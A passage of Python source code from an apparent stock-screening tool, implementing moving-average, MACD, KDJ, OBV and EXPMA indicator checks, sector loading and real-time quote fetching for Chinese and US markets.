self.__endindex > self.__startindex:
return False, ret
traversalindex = self.__endindex + traverseback
i = traversalindex
if self.__period > 1:
while i < self.__endindex:
totalinperiod += fn_ticker(i)
i += 1
outindex = self.__endindex
def calc():
nonlocal i, totalinperiod, traversalindex, outindex
totalinperiod += fn_ticker(i)
i += 1
tmptotal = totalinperiod
totalinperiod -= fn_ticker(traversalindex)
traversalindex += 1
ret[outindex] = tmptotal / self.__period
outindex += 1
calc()
while i <= self.__startindex:
calc()
return True, ret
def executeaction(self, **kwargs):
return self.__ma(kwargs['fn_ticker'])
class CROSSUpMAAction(ActionBase):
def __init__(self, data: pd.DataFrame):
super().__init__(data)
def __comparevalue(self, index: int, averagevalue: float64, period: int):
distance = - period # distance should be negative
open_cur = self.open_ticker(index)
close_cur = self.close_ticker(index)
# need to consider critical
guard = len(self._data) + distance - 2
if guard < 0:
close_pre_period = close_pre = close_cur
else:
close_pre_period = self.refer_ticker(index, - distance, self.close_ticker)
close_pre = self.refer_ticker(index, 1, self.close_ticker)
sma_pre = (averagevalue * period - close_cur + close_pre_period) / period
con_1 = close_cur >= averagevalue >= open_cur
con_2 = close_pre < sma_pre and open_cur >= averagevalue and close_cur >= averagevalue
return con_1 or con_2
def executeaction(self, **kwargs):
index_s = kwargs['startindex']
index_e = kwargs['endindex']
_cross_period = kwargs['cross_period']
_greater_period = kwargs['greater_period']
ret = pd.DataFrame(columns=columns)
ma_cross = MAAction(index_s, index_e, _cross_period, self._data)
valid_cross, result_cross = ma_cross.executeaction(fn_ticker=self.close_ticker)
sma_greater = MAAction(index_s, index_e, _greater_period, self._data)
valid_greater, result_greater = sma_greater.executeaction(fn_ticker=self.volume_ticker)
if valid_cross:
for index_cross, average_cross in result_cross.items():
if self.__comparevalue(index_cross, average_cross, _cross_period):
row = self._data.loc[self._data.index[index_cross]]
ret.loc[len(ret)] = [row['gid'], row['open'], row['close'],
row['high'], row['low'], row['volume'],
row.name, False]
if valid_greater and \
index_cross in result_greater and \
self.volume_ticker(index_cross) > result_greater[index_cross]:
ret.loc[ret.index[-1]] = [row['gid'], row['open'], row['close'],
row['high'], row['low'], row['volume'],
row.name, True]
return True, ret
else:
return False, ret
class XMAAction(ActionBase):
def __init__(self, data: pd.DataFrame):
super().__init__(data)
def executeaction(self, **kwargs):
def calc_xma(index):
if index < minlength - 1:
logger.error("length of data must be greater than {} for {} in {}}".
format(minlength, reason, operationtype))
return False, values
valid_r, value_r = target(index)
intret = False
if valid_r:
if index == minlength - 1:
values[index] = weight * (value_r - intvalue) + intvalue
intret = True
else:
index_p = index - 1
intret = calc_xma(index_p)
if intret:
values[index] = weight * (value_r - values[index_p]) + values[index_p]
return valid_r and intret
minlength = kwargs['minlength']
target = kwargs['fnf']
weight = kwargs['weight']
intvalue = kwargs['intvalue']
reason = kwargs.get('reason', "")
operationtype = kwargs.get('operationtype', "")
values = [None for i in range(len(self._data.index))]
ret_v = calc_xma(len(self._data.index) - 1)
return ret_v, values
class MACDAction(ActionBase):
def __init__(self, data: pd.DataFrame, short_period, long_period, m_period):
super().__init__(data)
self.__short_period = short_period
self.__long_period = long_period
self.__m_period = m_period
self.__data_length = len(self._data.index)
self.__min_length = 1
self.__dif_long_v = [None for i in range(self.__data_length)]
self.__dif_short_v = [None for i in range(self.__data_length)]
self.__dif_v = [None for i in range(self.__data_length)]
self.__dea_v = [None for i in range(self.__data_length)]
self.__xma = XMAAction(data)
def __getCloseTicker(self, index):
valid = False
ret = None
if index < self.__min_length - 1:
logger.error("index is invalid in data for MACD", index)
else:
ret = self.close_ticker(index)
if ret is not None:
valid = True
return valid, ret
def __getdifvalue(self, index):
valid = False
ret = None
if index < self.__min_length - 1:
logger.error("index is invalid in data for MACD", index)
else:
ret = self.__dif_v[index]
if ret is not None:
valid = True
return valid, ret
def executeaction(self, **kwargs):
ret_v, self.__dif_long_v = self.__xma.executeaction(minlength=self.__min_length,
fnf=self.__getCloseTicker,
weight=2 / (self.__long_period + 1),
intvalue=0,
reason='MACD_dif_long',
operationtype='EMA')
if ret_v:
ret_v, self.__dif_short_v = self.__xma.executeaction(minlength=self.__min_length,
fnf=self.__getCloseTicker,
weight=2 / (self.__short_period + 1),
intvalue=0,
reason='MACD_dif_short',
operationtype='EMA')
if ret_v:
index = 0
while index < self.__data_length:
if self.__dif_short_v[index] is not None and self.__dif_long_v[index] is not None:
self.__dif_v[index] = self.__dif_short_v[index] - self.__dif_long_v[index]
index += 1
ret_v, self.__dea_v = self.__xma.executeaction(minlength=self.__min_length,
fnf=self.__getdifvalue,
weight=2 / (self.__m_period + 1),
intvalue=0,
reason='MACD_dea',
operationtype='EMA')
return ret_v, self.__dif_v, self.__dea_v
class StrategyBasedonMACDAction(ActionBase):
def __init__(self, data: pd.DataFrame, period, short_period=12, long_period=26, m_period=9):
super().__init__(data)
self.__period = period
self.__macd = MACDAction(data, short_period, long_period, m_period)
self.__ret_v, self.__dif_v, self.__dea_v = self.__macd.executeaction()
def executeaction(self, **kwargs):
operation = kwargs.get('operation', '')
ret_valid = False
ret_valid_int = True
ret_value = pd.DataFrame(columns=columns)
data_length = len(self._data.index)
if self.__ret_v and data_length >= self.__period:
ret_valid = True
if operation == 'strict':
count = 0
cursor = data_length - 1
while count < self.__period:
dif_c = self.__dif_v[cursor]
dea_c = self.__dea_v[cursor]
if dif_c is None or dea_c is None:
ret_valid = False
ret_valid_int = False
break
else:
if dif_c > dea_c:
if count < self.__period - 1:
dif_p = self.__dif_v[cursor - 1]
dea_p = self.__dea_v[cursor - 1]
if dif_p is None or dea_p is None:
ret_valid = False
ret_valid_int = False
break
elif dif_c <= dif_p or dea_c <= dea_p:
ret_valid_int = False
break
else:
ret_valid_int = False
break
count += 1
cursor -= 1
elif operation == 'dif':
count = 0
cursor = data_length - 1
while count < self.__period:
dif_c = self.__dif_v[cursor]
if dif_c is None:
ret_valid = False
ret_valid_int = False
break
else:
if count < self.__period - 1:
dif_p = self.__dif_v[cursor - 1]
if dif_p is None:
ret_valid = False
ret_valid_int = False
break
elif dif_c <= dif_p:
ret_valid_int = False
break
count += 1
cursor -= 1
elif operation == 'cross_up':
try:
diff, dea, macd = MACD(self._data.close.values)
tmp_ret = CROSS(diff, dea)
if tmp_ret[-2] or not tmp_ret[-1]:
ret_valid_int = False
except BaseException as be:
logger.error("MACD is failed", be)
ret_valid = False
ret_valid_int = False
else:
ret_valid = False
ret_valid_int = False
logger.error("operation is not suppored by MACDGOUP", operation)
if ret_valid_int:
time_stamp = self._data.index[-1]
row = self._data.loc[time_stamp]
ret_value.loc[len(ret_value)] = [row['gid'], row['open'], row['close'],
row['high'], row['low'], row['volume'],
time_stamp, True]
return ret_valid, ret_value
class LLVAction(ActionBase):
def __init__(self, data: pd.DataFrame, rsv_period):
super().__init__(data)
self.__period = rsv_period
def executeaction(self, **kwargs):
ret_value = 0
function = kwargs['fn_ticker']
index = kwargs['index_c']
if index - (self.__period - 1) < 0:
return False, ret_value
for i in range(self.__period):
index_internal = index - i
price = function(index_internal)
if i == 0:
ret_value = price
elif price < ret_value:
ret_value = price
return True, ret_value
class HHVAction(ActionBase):
def __init__(self, data: pd.DataFrame, rsv_period):
super().__init__(data)
self.__period = rsv_period
def executeaction(self, **kwargs):
ret_value = 0
function = kwargs['fn_ticker']
index = kwargs['index_c']
if index - (self.__period - 1) < 0:
return False, ret_value
for i in range(self.__period):
index_internal = index - i
price = function(index_internal)
if i == 0:
ret_value = price
elif price > ret_value:
ret_value = price
return True, ret_value
class KDAction(ActionBase):
def __init__(self, data: pd.DataFrame, rsvperiod, kperiod, dperiod):
super().__init__(data)
self.__rsv_period = rsvperiod
self.__k_period = kperiod
self.__d_period = dperiod
self.__llvaction = LLVAction(self._data, self.__rsv_period)
self.__hhvaction = HHVAction(self._data, self.__rsv_period)
self.__k_v = [None for i in range(len(self._data.index))]
self.__d_v = [None for i in range(len(self._data.index))]
self.__xma = XMAAction(data)
def __rsv(self, index):
ret = 0
valid1, result_llv = self.__llvaction.executeaction(fn_ticker=self.low_ticker, index_c=index)
if not valid1:
return valid1, ret
valid2, result_hhv = self.__hhvaction.executeaction(fn_ticker=self.high_ticker, index_c=index)
if not valid2:
return valid2, ret
ret = (self.close_ticker(index) - result_llv) / (result_hhv - result_llv) * 100
return True, ret
def __kvalue(self, index):
valid = False
ret = None
if index < self.__rsv_period - 1 or index >= len(self.__k_v):
logger.error("index is invalid in kvalue", index)
else:
ret = self.__k_v[index]
if ret is not None:
valid = True
return valid, ret
'''
def sma(self, fnf, n, m, index, values):
if index < self.__rsv_period - 1:
logger.error("index must be greater than %d for KD in sma", self.__rsv_period - 1)
return False
valid_r, value_r = fnf(index)
k_t_v = False
if valid_r:
if index == self.__rsv_period - 1:
values[index] = (value_r*m + 50*(n-m))/n
k_t_v = True
else:
index_p = index - 1
k_t_v = self.sma(fnf, n, m, index_p, values)
if k_t_v:
values[index] = (value_r*m + values[index_p]*(n-m))/n
return valid_r and k_t_v
'''
def executeaction(self, **kwargs):
ret_v, self.__k_v = self.__xma.executeaction(minlength=self.__rsv_period,
fnf=self.__rsv,
weight=1/self.__k_period,
intvalue=50,
reason='KD_k',
operationtype='SMA')
if ret_v:
ret_v, self.__d_v = self.__xma.executeaction(minlength=self.__rsv_period,
fnf=self.__kvalue,
weight=1/self.__d_period,
intvalue=50,
reason='KD_d',
operationtype='SMA')
return ret_v, self.__k_v, self.__d_v
class StrategyBasedOnKDAction(ActionBase):
def __init__(self, data: pd.DataFrame):
super().__init__(data)
def crossupaction(self, time_stamp, k_v, d_v, c_v):
index_c = self.getindex(time_stamp)
if index_c is None:
return False
index_p = index_c - 1
length = len(self._data.index)
if index_c >= length or index_c < 0 or index_p >= length or index_p < 0:
return False
k_c_v = k_v[index_c]
d_c_v = d_v[index_c]
k_p_v = k_v[index_p]
d_p_v = d_v[index_p]
if k_p_v < d_p_v and k_c_v > d_c_v:
if c_v[0]:
if not (k_c_v > c_v[1] and k_p_v > c_v[1]) and not (d_c_v > c_v[1] and d_p_v > c_v[1]):
return True
else:
return True
return False
def entangleaction(self, time_stamp, periods, k_v, d_v, c_v):
def comparevalue():
if len(kd_results) < periods:
return False
ret = True
for ii in range(periods):
k_v_ii = kd_results[ii][0]
d_v_ii = kd_results[ii][1]
ret &= self.__compare_entanglement(k_v_ii, d_v_ii, 10)
if not ret:
break
return ret
kd_results = []
index_c = self.getindex(time_stamp)
if index_c is None:
return False
for i in range(periods):
index_t = index_c - i
if index_t < 0:
break
k_v_i = k_v[index_t]
d_v_i = d_v[index_t]
if k_v_i is not None and d_v_i is not None:
if c_v[0]:
if k_v_i <= c_v[1] and d_v_i <= c_v[1]:
kd_results.append((k_v_i, d_v_i))
else:
break
else:
kd_results.append((k_v_i, d_v_i))
else:
break
return comparevalue()
def crossup_entangle_action(self, time_stamp, periods, k_v, d_v, c_v):
if self.crossupaction(time_stamp, k_v, d_v, (False, 0)):
index_c = self.getindex(time_stamp)
if index_c is None:
return False
k_v_c = k_v[index_c]
d_v_c = d_v[index_c]
if self.__compare_entanglement(k_v_c, d_v_c, 10):
return self.entangleaction(time_stamp, periods, k_v, d_v, c_v)
else:
index_p = index_c - 1
if index_p < periods - 1:
return False
time_stamp_p = self._data.index[index_p]
return self.entangleaction(time_stamp_p, periods, k_v, d_v, c_v)
return False
def crossup_entangle_period_action(self, time_stamp, periods, duration, k_v, d_v):
if self.crossupaction(time_stamp, k_v, d_v, (False, 0)):
if self.crossup_entangle_action(time_stamp, periods, k_v, d_v, (False, 0)):
return True
index_c = self.getindex(time_stamp)
if index_c is None:
return False
index_s = index_c - 2
if index_s < periods:
return False
count = 1
index_i = index_s - 1
while index_i > -1:
if count > duration - 2:
break
time_stamp_i = self._data.index[index_i]
#TODO: try crossup_entangle_action out
if self.crossupaction(time_stamp_i, k_v, d_v, (False, 0)):
break
if self.entangleaction(time_stamp_i, periods, k_v, d_v, (False, 0)):
return True
index_i -= 1
count += 1
return False
def entangle_period_action(self, time_stamp, periods, duration, k_v, d_v):
index_c = self.getindex(time_stamp)
if index_c is None:
return False
index_s = index_c - 2
if index_s < periods:
return False
count = 1
index_i = index_s - 1
while index_i > -1:
if count > duration - 2:
break
time_stamp_i = self._data.index[index_i]
if self.entangleaction(time_stamp_i, periods, k_v, d_v, (False, 0)):
return True
index_i -= 1
count += 1
return False
def deviate_price_k_action(self, time_stamp, duration, k_values):
index_c = self.getindex(time_stamp)
if index_c is None:
return False
length = min(index_c + 1, duration)
count = 1
while count < length:
index = index_c - count
if self.close_ticker(index_c) < self.close_ticker(index) and \
k_values[index_c] > k_values[index]:
return True
count += 1
return False
def deviate_price_k_s_action(self, time_stamp, duration, k_values, d_values):
def GeneralLine(x1, y1, x2, y2):
# general formula: Ax+By+C=0
A = y2 - y1
B = x1 - x2
C = x2 * y1 - x1 * y2
return A, B, C
def cal_Intersection_Lines(line1, line2):
A1, B1, C1 = GeneralLine(*line1)
A2, B2, C2 = GeneralLine(*line2)
D = A1 * B2 - A2 * B1
if D == 0:
return None
else:
x = (B1 * C2 - B2 * C1) / D
y = (A2 * C1 - A1 * C2) / D
return x, y
index_c = self.getindex(time_stamp)
if index_c is None:
return False
if self.close_ticker(index_c) == 0 and self.open_ticker(index_c) == 0:
return False
tmp_time = datetime.time(hour=time_stamp.hour, minute=time_stamp.minute)
k_v = k_values
d_v = d_values
l_v = self._data.low.values
if DataContext.iscountryChina():
if tmp_time == datetime.time(hour=10, minute=30):
k_v = REF(k_v, 1)
d_v = REF(d_v, 1)
l_v = REF(l_v, 1)
elif tmp_time == datetime.time(hour=11, minute=30):
k_v = REF(k_v, 2)
d_v = REF(d_v, 2)
l_v = REF(l_v, 2)
elif tmp_time == datetime.time(hour=14):
k_v = REF(k_v, 3)
d_v = REF(d_v, 3)
l_v = REF(l_v, 3)
elif tmp_time == datetime.time(hour=15):
k_v = REF(k_v, 4)
d_v = REF(d_v, 4)
l_v = REF(l_v, 4)
else:
return False
else:
return False
try:
min_low_duration_v = LLV(l_v, duration)
except BaseException as be:
logger.error("LLV is failed", be)
return False
cross_v = CROSS(k_v, d_v)
if len(k_v) < duration or len(d_v) < duration:
return False
count = -1
while count > - duration:
if not cross_v[count - 1] and cross_v[count]:
break
count -= 1
else:
return False
cross_point = cal_Intersection_Lines([0, d_v[count - 1], 1, d_v[count]],
[0, k_v[count - 1], 1, k_v[count]])
if (min_low_duration_v[-1] - self.close_ticker(index_c)) > min_low_duration_v[-1] * 1 / 100 and \
(k_values[index_c] - cross_point[1]) > cross_point[1] * 5 / 100:
return True
return False
def __compare_entanglement(self, k_v_t, d_v_t, diff_v):
return abs(k_v_t - d_v_t) <= diff_v
def executeaction(self, **kwargs):
def locdata():
row = self._data.loc[time_stamp]
ret_value.loc[len(ret_value)] = [row['gid'], row['open'], row['close'],
row['high'], row['low'], row['volume'],
time_stamp, True]
occurrences = kwargs['occurrence_time']
operation = kwargs['operation']
c_v = kwargs.get('crossvalue', (False, 0))
periods = kwargs.get('periods', 1)
duration = kwargs.get('duration', 40)
rsv_p = kwargs.get('rsv_period', 9)
k_p = kwargs.get('k_period', 3)
d_p = kwargs.get('d_period', 3)
k_v_o = kwargs.get('KValues', None)
d_v_o = kwargs.get('DValues', None)
ret_valid = True
ret_value = pd.DataFrame(columns=columns)
if k_v_o is not None and d_v_o is not None:
valid = True
k_v = k_v_o
d_v = d_v_o
else:
# FIXME
# kd_indicator = KDAction(self._data, rsv_p, k_p, d_p)
# valid, k_v, d_v = kd_indicator.executeaction()
try:
k_v, d_v, j_v = KDJ(self._data.close.values, self._data.high.values, self._data.low.values)
valid = True
except BaseException as be:
logger.error("The KDJ is failed", be)
valid = False
if valid:
for time_stamp in occurrences:
if operation == 'cross_up':
if self.crossupaction(time_stamp, k_v, d_v, c_v):
locdata()
elif operation == 'entangle':
if self.entangleaction(time_stamp, periods, k_v, d_v, c_v):
locdata()
elif operation == 'entangle_and_cross_up':
if self.crossup_entangle_action(time_stamp, periods, k_v, d_v, c_v):
locdata()
elif operation == 'entangle_and_cross_up_within_period':
if self.crossup_entangle_period_action(time_stamp, periods, duration, k_v, d_v):
locdata()
elif operation == 'entangle_within_period':
if self.entangle_period_action(time_stamp, periods, duration, k_v, d_v):
locdata()
elif operation == 'divergence_price_lower_and_k_higher':
if self.deviate_price_k_action(time_stamp, duration, k_v):
locdata()
elif operation == 'divergence_price_lower_and_k_higher_simple':
if self.deviate_price_k_s_action(time_stamp, duration, k_v, d_v):
locdata()
else:
logger.error("%s is not supported!" % operation)
else:
ret_valid = False
return ret_valid, ret_value
class OBVAction(ActionBase):
def __init__(self, data: pd.DataFrame, obv_period: int):
super().__init__(data)
self.__obv_p = obv_period
def executeaction(self, **kwargs):
index = kwargs['index']
total_value = 0
ret_valid = False
if index - (self.__obv_p - 1) < 0:
return ret_valid, total_value
for i in range(self.__obv_p):
index_internal = index - i
price_dist = self.high_ticker(index_internal) - self.low_ticker(index_internal)
if price_dist != 0:
total_value += self.volume_ticker(index_internal) * \
((self.close_ticker(index_internal)-self.low_ticker(index_internal))-
(self.high_ticker(index_internal)-self.close_ticker(index_internal)))/price_dist
else:
ret_valid = True
return ret_valid, total_value
class OBVUpACTION(ActionBase):
def __init__(self, data: pd.DataFrame):
super().__init__(data)
def __calcv_a_obv(self, index: int, period_a: int, period: int):
ret_valid = False
total_value = 0
obv_indicator = OBVAction(self._data, period)
if index - (period_a - 1) - (period - 1) < 0:
return ret_valid, total_value
for i in range(period_a):
index_interal = index - i
valid, obv_v = obv_indicator.executeaction(index=index_interal)
if not valid:
break
total_value += obv_v
else:
total_value = total_value / period_a
ret_valid = True
return ret_valid, total_value
def executeaction(self, **kwargs):
occurrences = kwargs['occurrence_time']
obv_p = kwargs['obv_period']
obv_a_p = kwargs['obv_a_period']
ret_valid = False
ret_value = pd.DataFrame(columns=columns)
obv_indicator = OBVAction(self._data, obv_p)
oa = occurrences.array
for time_stamp_original in oa:
cur_index = self.getindex(time_stamp_original)
if cur_index is None:
continue
valid1, obv_v = obv_indicator.executeaction(index=cur_index)
if valid1:
valid2, obv_a_v = self.__calcv_a_obv(cur_index, obv_a_p, obv_p)
if valid2:
ret_valid = True
if obv_v > 0 and obv_v > obv_a_v:
row = self._data.loc[time_stamp_original]
ret_value.loc[len(ret_value)] = [row['gid'], row['open'], row['close'],
row['high'], row['low'], row['volume'],
time_stamp_original, True]
return ret_valid, ret_value
class StrategyBasedOnDayKAction(ActionBase):
def __init__(self, data: pd.DataFrame):
super().__init__(data)
self.__min_length = 1
def __getCloseTicker(self, index):
valid = False
ret = None
if index < self.__min_length - 1:
logger.error("index is invalid in data for EXPEMA", index)
else:
ret = self.close_ticker(index)
if ret is not None:
valid = True
return valid, ret
def __calcamplitudeavg(self, period: int, percent: float):
ret_valid_t = False
ret_value_t = False
requiredlength = period + 2
if len(self._data) < requiredlength:
return ret_valid_t, ret_value_t
ret_valid_t = True
total: float = 0
for i in range(1, requiredlength-1):
index: int = -1 - i
total += (self.high_ticker(index)-self.low_ticker(index))/self.close_ticker(index-1)
if total/period >= percent/100:
ret_value_t = True
return ret_valid_t, ret_value_t
def __calc_price_kavg(self, k_period, isgreater):
ret_valid_t = False
ret_value_t = False
if len(self._data.index) >= k_period:
start_index = end_index = -1
maaction = MAAction(start_index, end_index, k_period, self._data)
valid_ma, result_ma = maaction.executeaction(fn_ticker=self.close_ticker)
if valid_ma:
ret_valid_t = True
if start_index in result_ma:
tmp_ret = self.close_ticker(start_index) >= result_ma[start_index]
ret_value_t = not (isgreater ^ tmp_ret)
return ret_valid_t, ret_value_t
def __calckavg(self, k_period, calc_period, isgreater):
ret_valid_t = False
ret_value_t = True
start_index = -1
end_index = 0 - calc_period
if len(self._data.index) >= k_period + calc_period - 1:
maaction = MAAction(start_index, end_index, k_period, self._data)
valid_ma, result_ma = maaction.executeaction(fn_ticker=self.close_ticker)
if valid_ma:
ret_valid_t = True
if isgreater:
for index, avg_v in result_ma.items():
if self.close_ticker(index) <= avg_v:
ret_value_t = False
break
if isgreater and not ret_value_t:
return ret_valid_t, ret_value_t
count = 0
cursor = start_index
while count < calc_period - 1:
cursor_p = cursor - 1
if cursor in result_ma and cursor_p in result_ma:
if result_ma[cursor] <= result_ma[cursor_p]:
ret_value_t = False
break
else:
ret_value_t = False
break
count += 1
cursor -= 1
return ret_valid_t, ret_value_t
def __calcemadif(self, dif_period, calc_period):
ret_valid_t = False
ret_value_t = True
start_index = -1
ema = XMAAction(self._data)
ret_v, ema_dif_v = ema.executeaction(minlength=1,
fnf=self.__getCloseTicker,
weight=2 / (dif_period + 1),
intvalue=0,
reason='EXPMA_dif',
operationtype='EMA')
if ret_v:
ret_valid_t = True
count = 0
cursor = start_index
while count < calc_period - 1:
cursor_p = cursor - 1
if ema_dif_v[cursor] is not None and ema_dif_v[cursor_p] is not None:
if ema_dif_v[cursor] <= ema_dif_v[cursor_p]:
ret_value_t = False
break
else:
ret_value_t = False
break
count += 1
cursor -= 1
return ret_valid_t, ret_value_t
def executeaction(self, **kwargs):
operation = kwargs['operation']
amplitude_period = kwargs.get('amplitude_peroid', 5)
amplitude_percent = kwargs.get('amplitude_percent', 3)
avgk_k_period = kwargs.get('avgk_period', 20)
avgk_calc_period = kwargs.get('avgk_calc_period', 2)
avgk_greater = kwargs.get('avgk_greater', False)
avg_ema_dif_period = kwargs.get('avg_ema_dif_period', 12)
avg_ema_avg_period = kwargs.get('avg_ema_dif_period', 50)
ret_valid = False
ret_value_bool = False
ret_value = pd.DataFrame(columns=columns)
if operation == 'amplitude_avg':
ret_valid, ret_value_bool = self.__calcamplitudeavg(amplitude_period, amplitude_percent)
elif operation == 'avg_k_go':
ret_valid, ret_value_bool = self.__calckavg(avgk_k_period, avgk_calc_period, avgk_greater)
elif operation == 'price_k_avg':
ret_valid, ret_value_bool = self.__calc_price_kavg(avgk_k_period, avgk_greater)
elif operation == 'expma_dif_go':
ret_valid, ret_value_bool = self.__calcemadif(avg_ema_dif_period, avgk_calc_period)
else:
logger.error("%s is not supported!" % operation)
if ret_valid and ret_value_bool:
time_stamp = self._data.index[-1]
row = self._data.loc[time_stamp]
ret_value.loc[len(ret_value)] = [row['gid'], row['open'], row['close'],
row['high'], row['low'], row['volume'],
time_stamp, True]
return ret_valid, ret_value
class EXPMACrossAction(ActionBase):
def __init__(self, data: pd.DataFrame):
super().__init__(data)
def executeaction(self, **kwargs):
ret_valid = True
ret_value = pd.DataFrame(columns=columns)
if len(self._data.close) < 2:
ret_valid = False
return ret_valid, ret_value
try:
expma_12, expma_50 = EXPMA(self._data.close.values)
tmp_ret = CROSS(expma_12, expma_50)
if tmp_ret[-2] == 0 and tmp_ret[-1] == 1:
time_stamp = self._data.index[-1]
row = self._data.loc[time_stamp]
ret_value.loc[len(ret_value)] = [row['gid'], row['open'], row['close'],
row['high'], row['low'], row['volume'],
time_stamp, True]
except BaseException as be:
logger.error("The EXPMA is failed", be)
ret_valid = False
return ret_valid, ret_value
class StockData:
def __init__(self, sector: str = ''):
self.sector = sector
self.__data = {}
def update(self, symbol: str, data: pd.DataFrame):
self.__data.update({str(symbol): data})
def get(self, symbol: str) -> pd.DataFrame:
try:
ret = self.__data[str(symbol)]
except Exception as ee:
logger.error("error >>>", ee)
traceback.print_exc()
ret = pd.DataFrame(columns=columns)
return ret
def has_symbol(self, symbol: str) -> bool:
if symbol in self.__data:
return True
else:
return False
def keys(self):
return self.__data.keys()
def clear(self):
self.__data.clear()
def remove(self, symbol: str) -> pd.DataFrame:
try:
if symbol in self.__data:
del self.__data[symbol]
except Exception as ee:
logger.error("error >>>", ee)
traceback.print_exc()
def loadsectors(context: DataContext):
if not DataContext.iscountryChina():
return
filename = "sectors_allocation"
filepath = os.path.join(r'./', filename)
append_value(context.sectors, '000001', [str(code).zfill(6) for code in DataContext.code_spotlighted])
with open(filepath, 'r') as file:
for line in file.read().splitlines():
sector_symbols = line.split(":")
if len(sector_symbols) > 1:
symbols = sector_symbols[1].split(",")
if len(symbols) > 1:
for symbol in symbols:
append_value(context.sectors, sector_symbols[0], symbol)
def loadsectorsfromEM():
date_t = datetime.datetime.today().replace(hour=0, minute=0, second=0, microsecond=0).strftime("%Y-%m-%d")
if DataContext.iscountryChina():
sectors = sectors_CN.keys()
elif DataContext.iscountryUS():
sectors = sectors_US.keys()
filename = "sectors_allocation"
filepath = os.path.join(r'./', filename)
with open(filepath, 'w+') as file:
for sector_i in sectors:
if sector_i == '000001':
pass
else:
data = c.sector(sector_i, date_t)
if data.ErrorCode != 0:
logger.debug("request sector %s Error, %s" % (sector_i, data.ErrorMsg))
else:
file.write('{}:'.format(sector_i))
symbolsinsector = []
for code in data.Data:
code_l = code.split(".")
if len(code_l) > 1:
symbolsinsector.append(code_l[0])
file.writelines(",".join(symbolsinsector))
file.write('\r\n')
fetchdatacounter = 0
barcounter_15 = 0
roundresult_15 = 0
firstroundresult_15 = 0
barcounter_30 = 0
roundresult_30 = 0
firstroundresult_30 = 0
barcounter_60 = 0
roundresult_60 = 0
firstroundresult_60 = 0
fetch_count = 1
def snapshot(context: DataContext):
# 1) rank sectors over previous consecutive 10 business days
# 2) start fetching data once market is open
# 3) get a snapshot of stocks depending on country every other 3 seconds according to limitation
# 4) update stock data in context
# 5) calculate indicators based on newly fetched stock data
# 6) send result to another thread to handle
global fetchdatacounter, fetch_count
global barcounter_15, roundresult_15, firstroundresult_15
global barcounter_30, roundresult_30, firstroundresult_30
global barcounter_60, roundresult_60, firstroundresult_60
current_time = datetime.datetime.now()
current_date = datetime.date.today()
if DataContext.iscountryChina():
opentime = datetime.datetime.combine(current_date, context.marketopentime)
closetime = datetime.datetime.combine(current_date, context.marketclosetime)
breakstarttime = datetime.datetime.combine(current_date, context.marketbreakstarttime)
breakstoptime = datetime.datetime.combine(current_date, context.marketbreakstoptime)
elif DataContext.iscountryUS():
opentime = datetime.datetime.combine(current_date, context.marketopentime)
closetime = datetime.datetime.combine(current_date, context.marketclosetime)
target_time = datetime.timedelta(days=0, hours=0, minutes=0, seconds=0)
symbols_exchange = []
for sector in context.markets:
symbols_exchange += context.symbols_exchange[stock_group[sector]]
symbols_original_len = len(symbols_exchange)
symbols_tmp = set(symbols_exchange)
symbols_tmp.difference_update(DataContext.invalid_stock_codes)
symbols_exchange = list(symbols_tmp)
def update_stock_data_in_context(timeout=0):
global fetchdatacounter, fetch_count
global barcounter_15, roundresult_15, firstroundresult_15
global barcounter_30, roundresult_30, firstroundresult_30
global barcounter_60, roundresult_60, firstroundresult_60
# 1) french data
logger.debug("totally scan %d stocks but the number of original stock codes is %d" %
(len(symbols_exchange), symbols_original_len))
'''
EM has been obsoleted.
stock_data = csqsnapshot_t(symbols_exchange, "NOW,VOLUME,OPEN,HIGH,LOW", "Ispandas=1")
if not isinstance(stock_data, c.EmQuantData):
'''
logger.debug("Start to fetch stock data count: {}".format(fetch_count))
starttime = time.perf_counter()
stock_data = None
try:
# FIXME: only for datasource AKShare
# stock_data = ak.stock_zh_a_spot()
# need to set applied_data_source
applied_data_source = DataSource.EFINANCE
stock_data = ef.stock.get_realtime_quotes()
stock_data.columns = [
'CODE',
'_',
'_',
'NOW',
'HIGH',
'LOW',
'OPEN',
'_',
'_',
'_',
'_',
'VOLUME',
'_',
'_',
'_',
'_',
'_',
'_'
]
stock_data = stock_data[[
'CODE',
'NOW',
'HIGH',
'LOW',
'OPEN',
'VOLUME'
]]
stock_data = stock_data.astype({
'NOW': "float",
'HIGH': "float",
'LOW': "float",
'OPEN': "float",
'VOLUME': "float"
})
except:
logger.error("It was failed to get stock data count: {}".format(fetch_count))
endtime = time.perf_counter()
logger.debug("time consumption of count {} is {}s".format(fetch_count, endtime - starttime))
fetch_count += 1
if stock_data is None or not isinstance(stock_data, pd.DataFrame):
# FIXME: only for datasource AKShare
# logger.debug("request ak.stock_zh_a_spot Error at {} ".format(current_time))
logger.debug("request ef.stock.get_realtime_quotes Error at {} ".format(current_time))
time.sleep(timeout)
return False
else:
# 2) update stock data in context
logger.debug("request real quote with success at {} ".format(current_time))
fetchdatacounter += 1
logger.debug("fetchdatacounter is %d" % fetchdatacounter)
deltatime = current_time - opentime
roundresult_15 = deltatime.seconds // (15 * 60)
roundresult_30 = deltatime.seconds // (30 * 60)
if DataContext.iscountryChina():
if (current_time - opentime) >= target_time and (breakstarttime - current_time) >= target_time:
roundresult_60 = deltatime.seconds // (60 * 60)
else:
tmp_round = (current_time - breakstoptime).seconds // (60 * 60)
if tmp_round == 0:
roundresult_60 = 3
else:
roundresult_60 = tmp_round + 3
elif DataContext.iscountryUS():
if target_time <= (closetime - current_time) <= datetime.timedelta(days=0, hours=0, minutes=30,
seconds=0):
roundresult_60 = 7
else:
roundresult_60 = deltatime.seconds // (60 * 60)
time_windows_15[roundresult_15] += 1
time_windows_30[roundresult_30] += 1
time_windows_60[roundresult_60] += 1
if fetchdatacounter == 1:
firstroundresult_15 = roundresult_15
firstroundresult_30 = roundresult_30
firstroundresult_60 = roundresult_60
if time_windows_60[roundresult_60] == 1:
barcounter_60 += 1
logger.debug("The value of roundresult_60 is %d" % roundresult_60)
logger.debug("The number of 60 mins bar is %d" % barcounter_60)
if time_windows_30[roundresult_30] == 1:
barcounter_30 += 1
logger.debug("The value of roundresult_30 is %d" % roundresult_30)
logger.debug("The number of 30 mins bar is %d" % barcounter_30)
if time_windows_15[roundresult_15] == 1:
barcounter_15 += 1
logger.debug("The value of roundresult_15 is %d" % roundresult_15)
logger.debug("The number of 15 mins bar is %d" % barcounter_15)
# for the first time to update open value
updatestockdata(stock_data, True, applied_data_source)
else:
updatestockdata(stock_data, datasource=applied_data_source)
logger.debug("update stock data in context")
return True
